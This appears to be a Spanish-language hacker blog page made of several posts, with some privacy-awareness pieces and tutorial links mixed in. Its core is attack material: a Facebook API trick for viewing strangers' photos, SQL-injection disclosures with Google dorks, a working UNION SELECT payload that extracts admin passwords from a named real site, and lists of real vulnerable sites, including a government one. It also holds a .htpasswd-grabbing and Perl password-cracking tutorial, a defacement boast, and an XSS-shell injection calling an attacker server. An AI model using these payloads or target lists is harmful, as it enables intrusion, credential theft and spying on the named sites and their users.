PokerAr.com










Juga al Poker en argentina, gratis y online. PokerAr te ofrece la posibilidad de jugar directamente online sin necesidad de descargar software alguno como en otros servidores, Registrate y Juga.


www.PokerAr.com

Descontrolando Facebook


Cualquiera puede ver las fotos de Facebook de otra persona
sin haber sido aceptado como amigo muy fácilmente.



Se trata de un bug o error de diseño en la API de Facebook que permite acceder a las fotos de un usuario con solo saber su número de ID.
Los pasos son los siguientes:

1. Tenemos que estar logueados en FB.
2. Entrar a developers.facebook.com/tools.php
3. Elegir en el menú desplegable “método” la opción “fql.query”
4. En el cuadro de texto “query” que aparecerá ingresar la siguiente consulta:
SELECT location, link FROM album WHERE owner=idDelContacto

Donde dice “idDelContacto” ahí tenemos que reemplazar eso por la ID de la persona que queremos espiar. Ese número es muy fácil de obtener, si te paras en cualquiera de los links relativos a ella (como Agregar amigo, etc) en la URL aparece la variable id=xxxxxxx. Ese es el número de id del usuario.

Al hacer click en el botón aparecerá un código XML, del cual solo necesitas los links que están entre las etiquetas . Ese texto lo pegás en un navegador.

Si te fijas, la línea que acabas de pegar contiene el texto ( amp; ) es necesario borrar estos caracteres. a m p ; <- estos 4 caracteres. Y listo. Acceso a las fotos.

Esto sirve para tomar conciencia de la peligrosidad de subir información privada a internet. La única forma de evitarlo es incrementar los privilegios de seguridad de las fotos.

fuente: http://www.enmanosdenadie.com.ar

CMS IDEAS2 - SQL INYEXION

[][][][][][][][][][][][][][][][][][][][][][][][][][][][][][][][][][][][][][][][][][]

* Sql Inyexion
* Author: Mont
* www.argentinasecurity.com.ar
* Developer: http://ideas2.com.ar (creo)
* Dork: allinurl:"seccion_detalle.php?idseccion="

[][][][][][][][][][][][][][][][][][][][][][][][][][][][][][][][][][][][][][][][][][]

* SqlInyexion


PoC :
http://www.WEBVICTIMA.com/[path_vulnerable]='

Login:
http://www.WEBVICTIMA.com/admin
[][][][][][][][][][][][][][][][][][][][][][][][][][][][][][][][][][][][][][][][][][]

* Paths Vulnerables



producto_categoria.php?idcategoria=

seccion_detalle.php?idseccion=

seccion_categoria.php?idcategoria=


[][][][][][][][][][][][][][][][][][][][][][][][][][][][][][][][][][][][][][][][][][]

* Greetz:


n3xtdoor, MenteCriminal, rodr1, Em3trix, Bacan!, e #Inyexion

[][][][][][][][][][][][][][][][][][][][][][][][][][][][][][][][][][][][][][][][][][]

* Ejemplo aportado por MenteCriminal


http://www.piazzollatangoshow.com/seccion_detalle.php?idseccion=-1+UNION+SELECT+1,2,
3,4,5,concat_ws(0x3a,iduser_admin_login,usuario,password),7,8+
from+user_admin--

ideas2 : pato

--------------

WWW hacking

parte del control de acceso, la parte que estara cubierta son las directivas "authconfig". mas abajo veremos un archivo .htaccess tipico para webs con seguridad moderadamente pobre. (la mayoria de los sites porno usan esto como medida de seguridad, una practica excelente para crackear passwords)

/* a typical .htaccess file */ AuthName "Marvin Martian's Porn Emporium" AuthType Basic AuthUserFile /home/marvin/public_html/members/.htpasswd require valid-user

como vemos arriba, no hay muchas directivas para proveer proteccion con password a un directorio. como pueden ver en este caso, el webmaster fue algo olgazan y colgo el archivo .htpasswd dentro del mismo directorio. es formato del .htpasswd es simple.

en un server con seguridad pobre, no hay restricciones de acceso al archivo .htpasswd.
ya que el archivo .htpasswd esta en un directorio web-accessible, un usuario q tiene permiso de autentificarse en el directorio tiene el acceso a las listas de passwords.

simplemente entramos a la url member/.htpasswd, y recibiremos una lista full de usuarios y sus passwords encriptadas, algo estupido realmente, aunq si el archivo no existe, en un servidor mal configurado simplemente leemos el archivo .htaccess para ver donde se encuentra. si se encuentra bajo el "web-root" entonces necesitaremos un exploit-cgi para obtener el archivo. pero en cualquier otro directorio utilizaremos simplemente nuestro navegador para obtenerlo:

webmaster:TTn.VQRliM8c2 hornyguy:ZpgNeARi106aM fatmike69:drXj18zVxxBVc

desafortunadamente necesitaremos crackear estas contrasenias.

la unica manera de desencirptar estas passwords es usando la fuerza bruta.
un simple bruter en perl nos ayudara con la tarea:

#! /usr/bin/perl # crack.pl by fwaggle open (PASSFILE, ".htpasswd"); my @passfile = ; close PASSFILE; open (DICTFILE, "dictionary.txt"); my @dictfile = ; close DICTFILE; foreach $line (@passfile) { my ($username, $encpass) = split(/:/, $line); foreach $attempt (@dictfile) { if ($encpass eq crypt($attempt, $encpass)) { print("Cracked: ${username}:${attempt}\n"); } } }

aunq es recomendable usar otro cracker q funcione a mayor velocidad y en un lenguaje mas potente. (John the Ripper)

*si simplemente buscamos hackear algo o practicar buscamos el siguiente dork en google, ".htpass" y luego en los resultados entramos a los que dicen "Index of /loquesea" esos contiene el archivo .htpasswd


Ya hablamos de como romper estos passwords, ahora hablaremos un poco de como darle seguridad.
lo primero que debemos hacer es evitar q lean nuestro archivos .ht* , lo que podemos hacer como primera instancia es poner el archivo .htpasswd en algun lugar q no sea web-accessible (accesible via web).
Luego debemos negar el acceso a estos archivos a nuestros clientes (si somos los administradores de un servidor) no hay razon para q un cliente necesite ver estos archivos, ya que son de configuracion server side.

para ello usamos la siguiente directiva:
Order allow,deny Deny from all
como paso final nos aseguramos de tener suEXEC corriendo en apache, para tener acceso a los archivos solo por httpd, de esta manera podemos modificar los permisos con chmod al momento de editarlos nada mas.

Traducido para ArgentinaSecurity e Inyexion.com.ar por MONT

Noticias Valtic - Sql Inyexion

[][][][][][][][][][][][][][][][][][][][][][][][][][][][][][][][][][][][][][][][][][][][][][][][][][][][][][][][][]

* Sql Inyexion
* Lo Encontro? Mont (Si la encontro otro llegue tarde xD AVISEN PLEASE SI ENCONTRO OTR0)
* www.argentinasecurity.com.ar
* http://www.valtic.com.ar/ (DESARROLLADOR
* Dork: allinurl:noticias/display.php?ID

[][][][][][][][][][][][][][][][][][][][][][][][][][][][][][][][][][][][][][][][][][][][][][][][][][][][][][][][][]

* SqlInyexion


PoC :
http://www.WEBVICTIMA.com/noticias/display.php?ID='

[][][][][][][][][][][][][][][][][][][][][][][][][][][][][][][][][][][][][][][][][][][][][][][][][][][][][][][][][]

* Ejemplos



http://www.promositios.com/noticias/display.php?ID=%27

http://www.juegosgratisinternet.com/noticias/display.php?ID=%27

http://www.antivirusgratis.com.ar/noticias/display.php?ID=%27

http://www.tusbuscadores.com/notiprensa/display.php?ID=%27

http://descargasantivirusgratis.com/noticias/display.php?ID=%27

http://web.roldan.gov.ar/noticias.display.php?id=%27

http://www.pandaantivirus.com.ar/noticias/display.php?ID=%27

http://www.terravyt.com.ar/noticias/display.php?ID=%27

http://www.labradorygolden.com.ar/noticias/display.php?ID=%27

http://www.september11.com.ar/noticias/display.php?ID=%27

http://www.hotelennewyork.com/noticias/display.php?ID=%27

http://www.hotelenbrasil.com/noticias/display.php?ID=%27

Cronica Owned by Mont & Bacan



Los links a los demas screenshots:
http://img14.imageshack.us/img14/1664/cronicaowned.jpg
http://img14.imageshack.us/img14/6922/cronicaowned3.jpg
http://img15.imageshack.us/img15/4373/cronicaowned4.jpg
http://img15.imageshack.us/img15/3589/cronicaowned2.jpg

XSS TUNNELING

ahora q ya lo soltaron en #RE por fin se puede soltar tan libremente :)


Que es un Canal XSS?

Un Canal XSS es un canal interactivo entre 2 sistemas que se abre mediante un ataque XSS, A nivel tecnico es un tipo de aplicacion AJAX la cual puede solicitar comandos, enviar respuestas y hablar cross-domain.

La shell de xss es una herramienta que puede ser utilizada para configurar un canal xss entre la victima y el atacante, para

que el atacante controle el navegador de su victima mediante el envio de comandos. esta comunicacion es bi-direccional.

Para hacer que la shell trabaje, el atacante necesita inyecctar el JavaScript de la shell XSS que es referenciado mediante un simple xss. desde este punto el atacante es libre de controlar el navegador de su victima, puede ver peticiones, respuestas, y puede hacer q el navegador haga lo q este le pida.

un ejemplo de la inyeccion:

http://victima.com/gay="> script

src="http://xssshellserver/xssshell.asp" /script


http://rapidshare.com/files/214344116/XSSSS_tunelling.rar.html

La Verdad de los TESTS

Autor: Nicolas Montanaro

ArgentinaSecurity.com.ar



Las redes sociales online han crecido de manera extrema en los ultimos anios, facebook posee 45 millones de miembros activos, y aun asi no es la mas grande del mundo, y esta es solo una de las tantas. En este texto no nos vamos a enforcar en que es facebook, sin embargo al mal uso que algunas personas le pueden dar a esta herramienta social con algo tan inocente como los tests.

Sin darnos cuenta cada vez que respondemos tests, estamos revelando a millones de usuarios (en el caso de facebook 45) informacion sensible sobre nuestra persona,"Que Hora es?" "Donde Estas Ahora?" "Tu Nombre Completo:",'"Escribe tu numero de documento y luego suma sus digitos, ese es tu numero de la suerte"
Preguntas inocentes pero que a la vez revelan el horario y donde estamos usualmente a esa hora, nuestro nombre, numero de documento y un sin fin de datos q se obtienen con tan solo preguntar.

Imaginemos que respondemos el siguiente test:

Que tanto sabes de ti mismo?
tu nombre:
tu segundo nombre:
tu apellido:
nombre completo de tu madre:
nombre completo de tu padre:
fecha en que naciste:
tu padre de que trabaja:
tu madre de que trabaja:
que haces en este momento:
estas solo/a?:

siempre que terminamos de hacer un test lo publicamos para "comparar nuestras respuestas con amigos" quien lo mire no siempre es "amigo" pero al leerlo sabe mucho y puede tener malas intenciones. (no es necesario preguntar a que hora esta vacia tu casa entonces podemos entrar a robar?)

Si estuvieramos en la calle y alguien nos hace estas preguntas porque "solo quiere hacer un test", le mirariamos un par de veces la cara antes de responder, las notas que escribimos en facebook o sea cual sea la red social en la que estemos, NO TIENEN CARA por lo tanto confiamos.

Nuestro nombre es un comienzo, Datosvirtuales es una pagina que tiene datos de varias entidades referente (por ejemplo veraz) pero claro, es pago. Pero la opción de buscar un nombre o un dni/cuit/cdi es gratuita, así que ponemos o el dni (si ya lo conseguimos para confirmar) o si no lo tenemos ponemos el nombre "Pérez Juan" (primero el apellido y sin las comillas). Y como respuesta veremos gratuitamente el dni/cuil/cdi. y esto es tan solo un simple ejemplo, si te quiero robar quizas no necesito tu dni pero... si se donde queda tu casa? www.telexplorer.com es una guia online no solo comercial sino recidencial, que con SOLO EL NOMBRE se puede determinar donde vivimos y no solo eso tambien entrando a
http://www.bcra.gov.ar/cenries/cr010000.asp?error=0
con nuestro cuit/cuil/cdi podemos saber si este tiene deudas! asi como estas hay miles de paginas dando vueltas por la red.

Despues de todo no era solo un simple test no?

Se que fue aburrido, pero es para cuidarlos :)

ArgentinaSecurity.com.ar

Proximamente mas consejos.. solo pidan

Introducción a JavaScript

Indice de Contenidos
1: Introducción
2: El primer script
3: Programación básica
4: Programación avanzada
5: DOM
6: Eventos
7: Formularios
8: Otras utilidades
9: Detección y corrección de errores
10: Recursos útiles
11: Ejercicios resueltos

Descarga

Introducción a XML

PDF de 182 paginas sobre introduccion a XML.

Contenido:

Estructura de un documento XML
Documentos XML bien-formados
El prólogo
Elementos
Atributos
Entidades predefinidas
Secciones CDATA
Comentarios
Document Type Definitions (DTDs)
Declaraciones tipo Elemento
Modelos de contenido
Declaraciones de lista de Atributos
Tipos de Atributos
Declaración de Entidades
Ejemplo de DTD
Schemas XML
Extended Style Language (XSL)
XML Document Object Model y Visual Basic
XML Document Object Model y Java
Lenguaje de enlace XML
Enlaces de Interes

Link

Fuente: inyexion.com.ar

Bypassear la verificación de registro en foros

Este resumen no está disponible. Haz clic en este enlace para ver la entrada.